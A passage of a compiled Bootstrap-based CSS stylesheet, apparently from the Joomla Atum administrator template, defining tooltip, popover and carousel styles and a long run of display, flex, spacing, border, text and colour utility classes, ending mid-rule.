.bs-tooltip-end .tooltip-arrow, .bs-tooltip-auto[data-popper-placement^=right] .tooltip-arrow {
  left: 0;
  width: 0.4rem;
  height: 0.8rem;
}
.bs-tooltip-end .tooltip-arrow::before, .bs-tooltip-auto[data-popper-placement^=right] .tooltip-arrow::before {
  right: -1px;
  border-width: 0.4rem 0.4rem 0.4rem 0;
  border-right-color: #000;
}

.bs-tooltip-bottom, .bs-tooltip-auto[data-popper-placement^=bottom] {
  padding: 0.4rem 0;
}
.bs-tooltip-bottom .tooltip-arrow, .bs-tooltip-auto[data-popper-placement^=bottom] .tooltip-arrow {
  top: 0;
}
.bs-tooltip-bottom .tooltip-arrow::before, .bs-tooltip-auto[data-popper-placement^=bottom] .tooltip-arrow::before {
  bottom: -1px;
  border-width: 0 0.4rem 0.4rem;
  border-bottom-color: #000;
}

.bs-tooltip-start, .bs-tooltip-auto[data-popper-placement^=left] {
  padding: 0 0.4rem;
}
.bs-tooltip-start .tooltip-arrow, .bs-tooltip-auto[data-popper-placement^=left] .tooltip-arrow {
  right: 0;
  width: 0.4rem;
  height: 0.8rem;
}
.bs-tooltip-start .tooltip-arrow::before, .bs-tooltip-auto[data-popper-placement^=left] .tooltip-arrow::before {
  left: -1px;
  border-width: 0.4rem 0 0.4rem 0.4rem;
  border-left-color: #000;
}

.tooltip-inner {
  max-width: 200px;
  padding: 0.25rem 0.5rem;
  color: #fff;
  text-align: center;
  background-color: #000;
  border-radius: 0.25rem;
}

.popover {
  position: absolute;
  top: 0;
  left: 0 /* rtl:ignore */;
  z-index: 1060;
  display: block;
  max-width: 276px;
  font-family: var(--font-sans-serif);
  font-style: normal;
  font-weight: 400;
  line-height: 1.5;
  text-align: left;
  text-align: start;
  text-decoration: none;
  text-shadow: none;
  text-transform: none;
  letter-spacing: normal;
  word-break: normal;
  word-spacing: normal;
  white-space: normal;
  line-break: auto;
  font-size: 0.8rem;
  word-wrap: break-word;
  background-color: #fff;
  background-clip: padding-box;
  border: 1px solid rgba(0, 0, 0, 0.2);
  border-radius: 0.3rem;
}
.popover .popover-arrow {
  position: absolute;
  display: block;
  width: 1rem;
  height: 0.5rem;
}
.popover .popover-arrow::before, .popover .popover-arrow::after {
  position: absolute;
  display: block;
  content: "";
  border-color: transparent;
  border-style: solid;
}

.bs-popover-top > .popover-arrow, .bs-popover-auto[data-popper-placement^=top] > .popover-arrow {
  bottom: calc(-0.5rem - 1px);
}
.bs-popover-top > .popover-arrow::before, .bs-popover-auto[data-popper-placement^=top] > .popover-arrow::before {
  bottom: 0;
  border-width: 0.5rem 0.5rem 0;
  border-top-color: rgba(0, 0, 0, 0.25);
}
.bs-popover-top > .popover-arrow::after, .bs-popover-auto[data-popper-placement^=top] > .popover-arrow::after {
  bottom: 1px;
  border-width: 0.5rem 0.5rem 0;
  border-top-color: #fff;
}

.bs-popover-end > .popover-arrow, .bs-popover-auto[data-popper-placement^=right] > .popover-arrow {
  left: calc(-0.5rem - 1px);
  width: 0.5rem;
  height: 1rem;
}
.bs-popover-end > .popover-arrow::before, .bs-popover-auto[data-popper-placement^=right] > .popover-arrow::before {
  left: 0;
  border-width: 0.5rem 0.5rem 0.5rem 0;
  border-right-color: rgba(0, 0, 0, 0.25);
}
.bs-popover-end > .popover-arrow::after, .bs-popover-auto[data-popper-placement^=right] > .popover-arrow::after {
  left: 1px;
  border-width: 0.5rem 0.5rem 0.5rem 0;
  border-right-color: #fff;
}

.bs-popover-bottom > .popover-arrow, .bs-popover-auto[data-popper-placement^=bottom] > .popover-arrow {
  top: calc(-0.5rem - 1px);
}
.bs-popover-bottom > .popover-arrow::before, .bs-popover-auto[data-popper-placement^=bottom] > .popover-arrow::before {
  top: 0;
  border-width: 0 0.5rem 0.5rem 0.5rem;
  border-bottom-color: rgba(0, 0, 0, 0.25);
}
.bs-popover-bottom > .popover-arrow::after, .bs-popover-auto[data-popper-placement^=bottom] > .popover-arrow::after {
  top: 1px;
  border-width: 0 0.5rem 0.5rem 0.5rem;
  border-bottom-color: #fff;
}
.bs-popover-bottom .popover-header::before, .bs-popover-auto[data-popper-placement^=bottom] .popover-header::before {
  position: absolute;
  top: 0;
  left: 50%;
  display: block;
  width: 1rem;
  margin-left: -0.5rem;
  content: "";
  border-bottom: 1px solid #f0f0f0;
}

.bs-popover-start > .popover-arrow, .bs-popover-auto[data-popper-placement^=left] > .popover-arrow {
  right: calc(-0.5rem - 1px);
  width: 0.5rem;
  height: 1rem;
}
.bs-popover-start > .popover-arrow::before, .bs-popover-auto[data-popper-placement^=left] > .popover-arrow::before {
  right: 0;
  border-width: 0.5rem 0 0.5rem 0.5rem;
  border-left-color: rgba(0, 0, 0, 0.25);
}
.bs-popover-start > .popover-arrow::after, .bs-popover-auto[data-popper-placement^=left] > .popover-arrow::after {
  right: 1px;
  border-width: 0.5rem 0 0.5rem 0.5rem;
  border-left-color: #fff;
}

.popover-header {
  padding: 0.5rem 1rem;
  margin-bottom: 0;
  font-size: 1rem;
  color: var(--template-bg-dark);
  background-color: #f0f0f0;
  border-bottom: 1px solid rgba(0, 0, 0, 0.2);
  border-top-left-radius: calc(0.3rem - 1px);
  border-top-right-radius: calc(0.3rem - 1px);
}
.popover-header:empty {
  display: none;
}

.popover-body {
  padding: 1rem 1rem;
  color: var(--template-text-dark);
}

.carousel {
  position: relative;
}

.carousel.pointer-event {
  touch-action: pan-y;
}

.carousel-inner {
  position: relative;
  width: 100%;
  overflow: hidden;
}
.carousel-inner::after {
  display: block;
  clear: both;
  content: "";
}

.carousel-item {
  position: relative;
  display: none;
  float: left;
  width: 100%;
  margin-right: -100%;
  -webkit-backface-visibility: hidden;
          backface-visibility: hidden;
  transition: -webkit-transform 0.6s ease-in-out;
  transition: transform 0.6s ease-in-out;
  transition: transform 0.6s ease-in-out, -webkit-transform 0.6s ease-in-out;
}
@media (prefers-reduced-motion: reduce) {
  .carousel-item {
    transition: none;
  }
}

.carousel-item.active,
.carousel-item-next,
.carousel-item-prev {
  display: block;
}

/* rtl:begin:ignore */
.carousel-item-next:not(.carousel-item-start),
.active.carousel-item-end {
  -webkit-transform: translateX(100%);
          transform: translateX(100%);
}

.carousel-item-prev:not(.carousel-item-end),
.active.carousel-item-start {
  -webkit-transform: translateX(-100%);
          transform: translateX(-100%);
}

/* rtl:end:ignore */
.carousel-fade .carousel-item {
  opacity: 0;
  transition-property: opacity;
  -webkit-transform: none;
          transform: none;
}
.carousel-fade .carousel-item.active,
.carousel-fade .carousel-item-next.carousel-item-start,
.carousel-fade .carousel-item-prev.carousel-item-end {
  z-index: 1;
  opacity: 1;
}
.carousel-fade .active.carousel-item-start,
.carousel-fade .active.carousel-item-end {
  z-index: 0;
  opacity: 0;
  transition: opacity 0s 0.6s;
}
@media (prefers-reduced-motion: reduce) {
  .carousel-fade .active.carousel-item-start,
.carousel-fade .active.carousel-item-end {
    transition: none;
  }
}

.carousel-control-prev,
.carousel-control-next {
  position: absolute;
  top: 0;
  bottom: 0;
  z-index: 1;
  display: flex;
  align-items: center;
  justify-content: center;
  width: 15%;
  padding: 0;
  color: #fff;
  text-align: center;
  background: none;
  border: 0;
  opacity: 0.5;
  transition: opacity 0.15s ease;
}
@media (prefers-reduced-motion: reduce) {
  .carousel-control-prev,
.carousel-control-next {
    transition: none;
  }
}
.carousel-control-prev:hover, .carousel-control-prev:focus,
.carousel-control-next:hover,
.carousel-control-next:focus {
  color: #fff;
  text-decoration: none;
  outline: 0;
  opacity: 0.9;
}

.carousel-control-prev {
  left: 0;
}

.carousel-control-next {
  right: 0;
}

.carousel-control-prev-icon,
.carousel-control-next-icon {
  display: inline-block;
  width: 2rem;
  height: 2rem;
  background-repeat: no-repeat;
  background-position: 50%;
  background-size: 100% 100%;
}

/* rtl:options: {
  "autoRename": true,
  "stringMap":[ {
    "name"    : "prev-next",
    "search"  : "prev",
    "replace" : "next"
  } ]
} */
.carousel-control-prev-icon {
  background-image: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 16 16' fill='%23fff'%3e%3cpath d='M11.354 1.646a.5.5 0 0 1 0 .708L5.707 8l5.647 5.646a.5.5 0 0 1-.708.708l-6-6a.5.5 0 0 1 0-.708l6-6a.5.5 0 0 1 .708 0z'/%3e%3c/svg%3e");
}

.carousel-control-next-icon {
  background-image: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 16 16' fill='%23fff'%3e%3cpath d='M4.646 1.646a.5.5 0 0 1 .708 0l6 6a.5.5 0 0 1 0 .708l-6 6a.5.5 0 0 1-.708-.708L10.293 8 4.646 2.354a.5.5 0 0 1 0-.708z'/%3e%3c/svg%3e");
}

.carousel-indicators {
  position: absolute;
  right: 0;
  bottom: 0;
  left: 0;
  z-index: 2;
  display: flex;
  justify-content: center;
  padding: 0;
  margin-right: 15%;
  margin-bottom: 1rem;
  margin-left: 15%;
  list-style: none;
}
.carousel-indicators [data-bs-target] {
  box-sizing: content-box;
  flex: 0 1 auto;
  width: 30px;
  height: 3px;
  padding: 0;
  margin-right: 3px;
  margin-left: 3px;
  text-indent: -999px;
  cursor: pointer;
  background-color: #fff;
  background-clip: padding-box;
  border: 0;
  border-top: 10px solid transparent;
  border-bottom: 10px solid transparent;
  opacity: 0.5;
  transition: opacity 0.6s ease;
}
@media (prefers-reduced-motion: reduce) {
  .carousel-indicators [data-bs-target] {
    transition: none;
  }
}
.carousel-indicators .active {
  opacity: 1;
}

.carousel-caption {
  position: absolute;
  right: 15%;
  bottom: 1.25rem;
  left: 15%;
  padding-top: 1.25rem;
  padding-bottom: 1.25rem;
  color: #fff;
  text-align: center;
}

.carousel-dark .carousel-control-prev-icon,
.carousel-dark .carousel-control-next-icon {
  -webkit-filter: invert(1) grayscale(100);
          filter: invert(1) grayscale(100);
}
.carousel-dark .carousel-indicators [data-bs-target] {
  background-color: #000;
}
.carousel-dark .carousel-caption {
  color: #000;
}

.align-baseline {
  vertical-align: baseline !important;
}

.align-top {
  vertical-align: top !important;
}

.align-middle {
  vertical-align: middle !important;
}

.align-bottom {
  vertical-align: bottom !important;
}

.align-text-bottom {
  vertical-align: text-bottom !important;
}

.align-text-top {
  vertical-align: text-top !important;
}

.float-start {
  float: left !important;
}

.float-end {
  float: right !important;
}

.float-none {
  float: none !important;
}

.overflow-auto {
  overflow: auto !important;
}

.overflow-hidden {
  overflow: hidden !important;
}

.overflow-visible {
  overflow: visible !important;
}

.overflow-scroll {
  overflow: scroll !important;
}

.d-inline {
  display: inline !important;
}

.d-inline-block {
  display: inline-block !important;
}

.d-block {
  display: block !important;
}

.d-grid {
  display: grid !important;
}

.d-table {
  display: table !important;
}

.d-table-row {
  display: table-row !important;
}

.d-table-cell {
  display: table-cell !important;
}

.d-flex {
  display: flex !important;
}

.d-inline-flex {
  display: inline-flex !important;
}

.d-none {
  display: none !important;
}

.shadow {
  box-shadow: 0 0.5rem 1rem rgba(0, 0, 0, 0.15) !important;
}

.shadow-sm {
  box-shadow: 0 0.125rem 0.25rem rgba(0, 0, 0, 0.075) !important;
}

.shadow-lg {
  box-shadow: 0 1rem 3rem rgba(0, 0, 0, 0.175) !important;
}

.shadow-none {
  box-shadow: none !important;
}

.position-static {
  position: static !important;
}

.position-relative {
  position: relative !important;
}

.position-absolute {
  position: absolute !important;
}

.position-fixed {
  position: fixed !important;
}

.position-sticky {
  position: sticky !important;
}

.top-0 {
  top: 0 !important;
}

.top-50 {
  top: 50% !important;
}

.top-100 {
  top: 100% !important;
}

.bottom-0 {
  bottom: 0 !important;
}

.bottom-50 {
  bottom: 50% !important;
}

.bottom-100 {
  bottom: 100% !important;
}

.start-0 {
  left: 0 !important;
}

.start-50 {
  left: 50% !important;
}

.start-100 {
  left: 100% !important;
}

.end-0 {
  right: 0 !important;
}

.end-50 {
  right: 50% !important;
}

.end-100 {
  right: 100% !important;
}

.translate-middle {
  -webkit-transform: translate(-50%, -50%) !important;
          transform: translate(-50%, -50%) !important;
}

.translate-middle-x {
  -webkit-transform: translateX(-50%) !important;
          transform: translateX(-50%) !important;
}

.translate-middle-y {
  -webkit-transform: translateY(-50%) !important;
          transform: translateY(-50%) !important;
}

.border {
  border: 1px solid #dee2e6 !important;
}

.border-0 {
  border: 0 !important;
}

.border-top {
  border-top: 1px solid #dee2e6 !important;
}

.border-top-0 {
  border-top: 0 !important;
}

.border-end {
  border-right: 1px solid #dee2e6 !important;
}

.border-end-0 {
  border-right: 0 !important;
}

.border-bottom {
  border-bottom: 1px solid #dee2e6 !important;
}

.border-bottom-0 {
  border-bottom: 0 !important;
}

.border-start {
  border-left: 1px solid #dee2e6 !important;
}

.border-start-0 {
  border-left: 0 !important;
}

.border-primary {
  border-color: #132f53 !important;
}

.border-secondary {
  border-color: #495057 !important;
}

.border-success {
  border-color: #457d54 !important;
}

.border-info {
  border-color: #2a69b8 !important;
}

.border-warning {
  border-color: #ffb514 !important;
}

.border-danger {
  border-color: #c52827 !important;
}

.border-light {
  border-color: #f8f9fa !important;
}

.border-dark {
  border-color: #212529 !important;
}

.border-atum-link-color {
  border-color: #2a69b8 !important;
}

.border-atum-text-dark {
  border-color: #495057 !important;
}

.border-action {
  border-color: #132f53 !important;
}

.border-error {
  border-color: #3b0d0c !important;
}

.border-alert-success {
  border-color: #0f2f21 !important;
}

.border-white {
  border-color: #fff !important;
}

.border-1 {
  border-width: 1px !important;
}

.border-2 {
  border-width: 2px !important;
}

.border-3 {
  border-width: 3px !important;
}

.border-4 {
  border-width: 4px !important;
}

.border-5 {
  border-width: 5px !important;
}

.w-25 {
  width: 25% !important;
}

.w-50 {
  width: 50% !important;
}

.w-75 {
  width: 75% !important;
}

.w-100 {
  width: 100% !important;
}

.w-auto {
  width: auto !important;
}

.mw-100 {
  max-width: 100% !important;
}

.vw-100 {
  width: 100vw !important;
}

.min-vw-100 {
  min-width: 100vw !important;
}

.h-25 {
  height: 25% !important;
}

.h-50 {
  height: 50% !important;
}

.h-75 {
  height: 75% !important;
}

.h-100 {
  height: 100% !important;
}

.h-auto {
  height: auto !important;
}

.mh-100 {
  max-height: 100% !important;
}

.vh-100 {
  height: 100vh !important;
}

.min-vh-100 {
  min-height: 100vh !important;
}

.flex-fill {
  flex: 1 1 auto !important;
}

.flex-row {
  flex-direction: row !important;
}

.flex-column {
  flex-direction: column !important;
}

.flex-row-reverse {
  flex-direction: row-reverse !important;
}

.flex-column-reverse {
  flex-direction: column-reverse !important;
}

.flex-grow-0 {
  flex-grow: 0 !important;
}

.flex-grow-1 {
  flex-grow: 1 !important;
}

.flex-shrink-0 {
  flex-shrink: 0 !important;
}

.flex-shrink-1 {
  flex-shrink: 1 !important;
}

.flex-wrap {
  flex-wrap: wrap !important;
}

.flex-nowrap {
  flex-wrap: nowrap !important;
}

.flex-wrap-reverse {
  flex-wrap: wrap-reverse !important;
}

.gap-0 {
  gap: 0 !important;
}

.gap-1 {
  gap: 0.25rem !important;
}

.gap-2 {
  gap: 0.5rem !important;
}

.gap-3 {
  gap: 1rem !important;
}

.gap-4 {
  gap: 1.5rem !important;
}

.gap-5 {
  gap: 3rem !important;
}

.justify-content-start {
  justify-content: flex-start !important;
}

.justify-content-end {
  justify-content: flex-end !important;
}

.justify-content-center {
  justify-content: center !important;
}

.justify-content-between {
  justify-content: space-between !important;
}

.justify-content-around {
  justify-content: space-around !important;
}

.justify-content-evenly {
  justify-content: space-evenly !important;
}

.align-items-start {
  align-items: flex-start !important;
}

.align-items-end {
  align-items: flex-end !important;
}

.align-items-center {
  align-items: center !important;
}

.align-items-baseline {
  align-items: baseline !important;
}

.align-items-stretch {
  align-items: stretch !important;
}

.align-content-start {
  align-content: flex-start !important;
}

.align-content-end {
  align-content: flex-end !important;
}

.align-content-center {
  align-content: center !important;
}

.align-content-between {
  align-content: space-between !important;
}

.align-content-around {
  align-content: space-around !important;
}

.align-content-stretch {
  align-content: stretch !important;
}

.align-self-auto {
  align-self: auto !important;
}

.align-self-start {
  align-self: flex-start !important;
}

.align-self-end {
  align-self: flex-end !important;
}

.align-self-center {
  align-self: center !important;
}

.align-self-baseline {
  align-self: baseline !important;
}

.align-self-stretch {
  align-self: stretch !important;
}

.order-first {
  order: -1 !important;
}

.order-0 {
  order: 0 !important;
}

.order-1 {
  order: 1 !important;
}

.order-2 {
  order: 2 !important;
}

.order-3 {
  order: 3 !important;
}

.order-4 {
  order: 4 !important;
}

.order-5 {
  order: 5 !important;
}

.order-last {
  order: 6 !important;
}

.m-0 {
  margin: 0 !important;
}

.m-1 {
  margin: 0.25rem !important;
}

.m-2 {
  margin: 0.5rem !important;
}

.m-3 {
  margin: 1rem !important;
}

.m-4 {
  margin: 1.5rem !important;
}

.m-5 {
  margin: 3rem !important;
}

.m-auto {
  margin: auto !important;
}

.mx-0 {
  margin-right: 0 !important;
  margin-left: 0 !important;
}

.mx-1 {
  margin-right: 0.25rem !important;
  margin-left: 0.25rem !important;
}

.mx-2 {
  margin-right: 0.5rem !important;
  margin-left: 0.5rem !important;
}

.mx-3 {
  margin-right: 1rem !important;
  margin-left: 1rem !important;
}

.mx-4 {
  margin-right: 1.5rem !important;
  margin-left: 1.5rem !important;
}

.mx-5 {
  margin-right: 3rem !important;
  margin-left: 3rem !important;
}

.mx-auto {
  margin-right: auto !important;
  margin-left: auto !important;
}

.my-0 {
  margin-top: 0 !important;
  margin-bottom: 0 !important;
}

.my-1 {
  margin-top: 0.25rem !important;
  margin-bottom: 0.25rem !important;
}

.my-2 {
  margin-top: 0.5rem !important;
  margin-bottom: 0.5rem !important;
}

.my-3 {
  margin-top: 1rem !important;
  margin-bottom: 1rem !important;
}

.my-4 {
  margin-top: 1.5rem !important;
  margin-bottom: 1.5rem !important;
}

.my-5 {
  margin-top: 3rem !important;
  margin-bottom: 3rem !important;
}

.my-auto {
  margin-top: auto !important;
  margin-bottom: auto !important;
}

.mt-0 {
  margin-top: 0 !important;
}

.mt-1 {
  margin-top: 0.25rem !important;
}

.mt-2 {
  margin-top: 0.5rem !important;
}

.mt-3 {
  margin-top: 1rem !important;
}

.mt-4 {
  margin-top: 1.5rem !important;
}

.mt-5 {
  margin-top: 3rem !important;
}

.mt-auto {
  margin-top: auto !important;
}

.me-0 {
  margin-right: 0 !important;
}

.me-1 {
  margin-right: 0.25rem !important;
}

.me-2 {
  margin-right: 0.5rem !important;
}

.me-3 {
  margin-right: 1rem !important;
}

.me-4 {
  margin-right: 1.5rem !important;
}

.me-5 {
  margin-right: 3rem !important;
}

.me-auto {
  margin-right: auto !important;
}

.mb-0 {
  margin-bottom: 0 !important;
}

.mb-1 {
  margin-bottom: 0.25rem !important;
}

.mb-2 {
  margin-bottom: 0.5rem !important;
}

.mb-3, .form-group {
  margin-bottom: 1rem !important;
}

.mb-4 {
  margin-bottom: 1.5rem !important;
}

.mb-5 {
  margin-bottom: 3rem !important;
}

.mb-auto {
  margin-bottom: auto !important;
}

.ms-0 {
  margin-left: 0 !important;
}

.ms-1 {
  margin-left: 0.25rem !important;
}

.ms-2 {
  margin-left: 0.5rem !important;
}

.ms-3 {
  margin-left: 1rem !important;
}

.ms-4 {
  margin-left: 1.5rem !important;
}

.ms-5 {
  margin-left: 3rem !important;
}

.ms-auto {
  margin-left: auto !important;
}

.p-0 {
  padding: 0 !important;
}

.p-1 {
  padding: 0.25rem !important;
}

.p-2 {
  padding: 0.5rem !important;
}

.p-3 {
  padding: 1rem !important;
}

.p-4 {
  padding: 1.5rem !important;
}

.p-5 {
  padding: 3rem !important;
}

.px-0 {
  padding-right: 0 !important;
  padding-left: 0 !important;
}

.px-1 {
  padding-right: 0.25rem !important;
  padding-left: 0.25rem !important;
}

.px-2 {
  padding-right: 0.5rem !important;
  padding-left: 0.5rem !important;
}

.px-3 {
  padding-right: 1rem !important;
  padding-left: 1rem !important;
}

.px-4 {
  padding-right: 1.5rem !important;
  padding-left: 1.5rem !important;
}

.px-5 {
  padding-right: 3rem !important;
  padding-left: 3rem !important;
}

.py-0 {
  padding-top: 0 !important;
  padding-bottom: 0 !important;
}

.py-1 {
  padding-top: 0.25rem !important;
  padding-bottom: 0.25rem !important;
}

.py-2 {
  padding-top: 0.5rem !important;
  padding-bottom: 0.5rem !important;
}

.py-3 {
  padding-top: 1rem !important;
  padding-bottom: 1rem !important;
}

.py-4 {
  padding-top: 1.5rem !important;
  padding-bottom: 1.5rem !important;
}

.py-5 {
  padding-top: 3rem !important;
  padding-bottom: 3rem !important;
}

.pt-0 {
  padding-top: 0 !important;
}

.pt-1 {
  padding-top: 0.25rem !important;
}

.pt-2 {
  padding-top: 0.5rem !important;
}

.pt-3 {
  padding-top: 1rem !important;
}

.pt-4 {
  padding-top: 1.5rem !important;
}

.pt-5 {
  padding-top: 3rem !important;
}

.pe-0 {
  padding-right: 0 !important;
}

.pe-1 {
  padding-right: 0.25rem !important;
}

.pe-2 {
  padding-right: 0.5rem !important;
}

.pe-3 {
  padding-right: 1rem !important;
}

.pe-4 {
  padding-right: 1.5rem !important;
}

.pe-5 {
  padding-right: 3rem !important;
}

.pb-0 {
  padding-bottom: 0 !important;
}

.pb-1 {
  padding-bottom: 0.25rem !important;
}

.pb-2 {
  padding-bottom: 0.5rem !important;
}

.pb-3 {
  padding-bottom: 1rem !important;
}

.pb-4 {
  padding-bottom: 1.5rem !important;
}

.pb-5 {
  padding-bottom: 3rem !important;
}

.ps-0 {
  padding-left: 0 !important;
}

.ps-1 {
  padding-left: 0.25rem !important;
}

.ps-2 {
  padding-left: 0.5rem !important;
}

.ps-3 {
  padding-left: 1rem !important;
}

.ps-4 {
  padding-left: 1.5rem !important;
}

.ps-5 {
  padding-left: 3rem !important;
}

.font-monospace {
  font-family: var(--font-monospace) !important;
}

.fs-1 {
  font-size: calc(1.29rem + 0.48vw) !important;
}

.fs-2 {
  font-size: calc(1.275rem + 0.3vw) !important;
}

.fs-3 {
  font-size: 1.25rem !important;
}

.fs-4 {
  font-size: 1rem !important;
}

.fs-5 {
  font-size: 0.9286rem !important;
}

.fs-6 {
  font-size: 0.8571rem !important;
}

.fst-italic {
  font-style: italic !important;
}

.fst-normal {
  font-style: normal !important;
}

.fw-light {
  font-weight: 300 !important;
}

.fw-lighter {
  font-weight: lighter !important;
}

.fw-normal {
  font-weight: 400 !important;
}

.fw-bold {
  font-weight: 700 !important;
}

.fw-bolder {
  font-weight: bolder !important;
}

.lh-1 {
  line-height: 1 !important;
}

.lh-sm {
  line-height: 1.25 !important;
}

.lh-base {
  line-height: 1.5 !important;
}

.lh-lg {
  line-height: 2 !important;
}

.text-start {
  text-align: left !important;
}

.text-end {
  text-align: right !important;
}

.text-center {
  text-align: center !important;
}

.text-decoration-none {
  text-decoration: none !important;
}

.text-decoration-underline {
  text-decoration: underline !important;
}

.text-decoration-line-through {
  text-decoration: line-through !important;
}

.text-lowercase {
  text-transform: lowercase !important;
}

.text-uppercase {
  text-transform: uppercase !important;
}

.text-capitalize {
  text-transform: capitalize !important;
}

.text-wrap {
  white-space: normal !important;
}

.text-nowrap {
  white-space: nowrap !important;
}

/* rtl:begin:remove */
.text-break {
  word-wrap: break-word !important;
  word-break: break-word !important;
}

/* rtl:end:remove */
.text-primary {
  color: #132f53 !important;
}

.text-secondary {
  color: #495057 !important;
}

.text-success {
  color: #457d54 !important;
}

.text-info {
  color: #2a69b8 !important;
}

.text-warning {
  color: #ffb514 !important;
}

.text-danger {
  color: #c52827 !important;
}

.text-light {
  color: #f8f9fa !important;
}

.text-dark {
  color: #212529 !important;
}

.text-atum-link-color {
  color: #2a69b8 !important;
}

.text-atum-text-dark {
  color: #495057 !important;
}

.text-action {
  color: #132f53 !important;
}

.text-error {
  color: #3b0d0c !important;
}

.text-alert-success {
  color: #0f2f21 !important;
}

.text-white {
  color: #fff !important;
}

.text-body {
  color: var(--template-text-dark) !important;
}

.text-muted {
  color: #666e76 !important;
}

.text-black-50 {
  color: rgba(0, 0, 0, 0.5) !important;
}

.text-white-50 {
  color: rgba(255, 255, 255, 0.5) !important;
}

.text-reset {
  color: inherit !important;
}

.bg-primary {
  background-color: #132f53 !important;
}

.bg-secondary {
  background-color: #495057 !important;
}

.bg-success {
  background-color: #457d54 !important;
}

.bg-info {
  background-color: #2a69b8 !important;
}

.bg-warning {
  background-color: #ffb514 !important;
}

.bg-danger {
  background-color: #c52827 !important;
}

.bg-light {
  background-color: #f8f9fa !important;
}

.bg-dark {
  background-color: #212529 !important;
}

.bg-atum-link-color {
  background-color: #2a69b8 !important;
}

.bg-atum-text-dark {
  background-color: #495057 !important;
}

.bg-action {
  background-color: #132f53 !important;
}

.bg-error {
  background-color: #3b0d0c !important;
}

.bg-alert-success {
  background-color: #0f2f21 !important;
}

.bg-body {
  background-color: #fff !important;
}

.bg-white {
  background-color: #fff !important;
}

.bg-transparent {
  background-color: transparent !important;
}

.bg-gradient {
  background-image: var(--gradient) !important;
}

.user-select-all {
  -webkit-user-select: all !important;
     -moz-user-select: all !important;
      -ms-user-select: all !important;
          user-select: all !important;
}

.user-select-auto {
  -webkit-user-select: auto !important;
     -moz-user-select: auto !important;
      -ms-user-select: auto !important;
          user-select: auto !important;
}

.user-select-none {
  -webkit-user-select: none !important;
     -moz-user-select: none !important;
      -ms-user-select: none !important;
          user-select: none !important;
}

.pe-none {
  pointer-events: none !important;
}

.pe-auto {
  pointer-events: auto !important;
}

.rounded {
  border-radius: 0.25rem !important;
}

.rounded-0 {
  border-radius: 0 !important;
}

.rounded-1 {
  border-radius: 0.2rem !important;
}

.rounded-2 {
  border-radius: 0.25rem !important;
}

.rounded-3 {
  border-radius: 0.3rem !important;
}

.rounded-circle {
  border-radius: 50% !important;
}

.rounded-pill {
  border-radius: 50rem !important;
}

.rounded-top {
  border-top-left-radius: 0.25rem !important;
  border-top-right-radius: 0.25rem !important;
}

.rounded-end {
  border-top-right-radius: 0.25rem !important;
  border-bottom-right-radius: 0.25rem !important;
}

.rounded-bottom {
  border-bottom-right-radius: 0.25rem !important;
  border-bottom-left-radius: 0.25rem !important;
}

.rounded-start {
  border-bottom-left-radius: 0.25rem !important;
  border-top-left-radius: 0.25rem !important;
}

.visible {
  visibility: visible !important;
}

.invisible {
  visibility: hidden !important;
}

@media (min-width: 576px) {
  .float-sm-start {
    float: left !important;
  }

  .float-sm-end {
    float: right !important;
  }

  .float-sm-none {
    float: none !important;
  }

  .d-sm-inline {
    display: inline !important;
  }

  .d-sm-inline-block {
    display: inline-block !important;
  }

  .d-sm-block {
    display: block !important;
  }

  .d-sm-grid {
    display: grid !important;
  }

  .d-sm-table {
    display: table !important;
  }

  .d-sm-table-row {
    display: table-row !important;
  }

  .d-sm-table-cell {
    display: table-cell !important;
  }

  .d-sm-flex {
    display: flex !important;
  }

  .d-sm-inline-flex {
    display: inline-flex !important;
  }

  .d-sm-none {
    display: none !important;
  }

  .flex-sm-fill {
    flex: 1 1 auto !important;
  }

  .flex-sm-row {
    flex-direction: row !important;
  }

  .flex-sm-column {
    flex-direction: column !important;
  }

  .flex-sm-row-reverse {
    flex-direction: row-reverse !important;
  }

  .flex-sm-column-reverse {
    flex-direction: column-reverse !important;
  }

  .flex-sm-grow-0 {
    flex-grow: 0 !important;
  }

  .flex-sm-grow-1 {
    flex-grow: 1 !important;
  }

  .flex-sm-shrink-0 {
    flex-shrink: 0 !important;
  }

  .flex-sm-shrink-1 {
    flex-shrink: 1 !important;
  }

  .flex-sm-wrap {
    flex-wrap: wrap !important;
  }

  .flex-sm-nowrap {
    flex-wrap: nowrap !important;
  }

  .flex-sm-wrap-reverse {
    flex-wrap: wrap-reverse !important;
  }

  .gap-sm-0 {
    gap: 0 !important;
  }

  .gap-sm-1 {
    gap: 0.25rem !important;
  }

  .gap-sm-2 {
    gap: 0.5rem !important;
  }

  .gap-sm-3 {
    gap: 1rem !important;
  }

  .gap-sm-4 {
    gap: 1.5rem !important;
  }

  .gap-sm-5 {
    gap: 3rem !important;
  }

  .justify-content-sm-start {
    justify-content: flex-start !important;
  }

  .justify-content-sm-end {
    justify-content: flex-end !important;
  }

  .justify-content-sm-center {
    justify-content: center !important;
  }

  .justify-content-sm-between {
    justify-content: space-between !important;
  }

  .justify-content-sm-around {
    justify-content: space-around !important;
  }

  .justify-content-sm-evenly {
    justify-content: space-evenly !important;
  }

  .align-items-sm-start {
    align-items: flex-start !important;
  }

  .align-items-sm-end {
    align-items: flex-end !important;
  }

  .align-items-sm-center {
    align-items: center !important;
  }

  .align-items-sm-baseline {
    align-items: baseline !important;
  }

  .align-items-sm-stretch {
    align-items: stretch !important;
  }

  .align-content-sm-start {
    align-content: flex-start !important;
  }

  .align-content-sm-end {
    align-content: flex-end !important;
  }

  .align-content-sm-center {
    align-content: center !important;
  }

  .align-content-sm-between {
    align-content: space-between !important;
  }

  .align-content-sm-around {
    align-content: space-around !important;
  }

  .align-content-sm-stretch {
    align-content: stretch !important;
  }

  .align-self-sm-auto {
    align-self: auto !important;
  }

  .align-self-sm-start {
    align-self: flex-start !important;
  }

  .align-self-sm-end {
    align-self: flex-end !important;
  }

  .align-self-sm-center {
    align-self: center !important;
  }

  .align-self-sm-baseline {
    align-self: baseline !important;
  }

  .align-self-sm-stretch {
    align-self: stretch !important;
  }

  .order-sm-first {
    order: -1 !important;
  }

  .order-sm-0 {
    order: 0 !important;
  }

  .order-sm-1 {
    order: 1 !important;
  }

  .order-sm-2 {
    order: 2 !important;
  }

  .order-sm-3 {
    order: 3 !important;
  }

  .order-sm-4 {
    order: 4 !important;
  }

  .order-sm-5 {
    order: 5 !important;
  }

  .order-sm-last {
    order: 6 !important;
  }

  .m-sm-0 {
    margin: 0 !important;
  }

  .m-sm-1 {
    margin: 0.25rem !important;
  }

  .m-sm-2 {
    margin: 0.5rem !important;
  }

  .m-sm-3 {
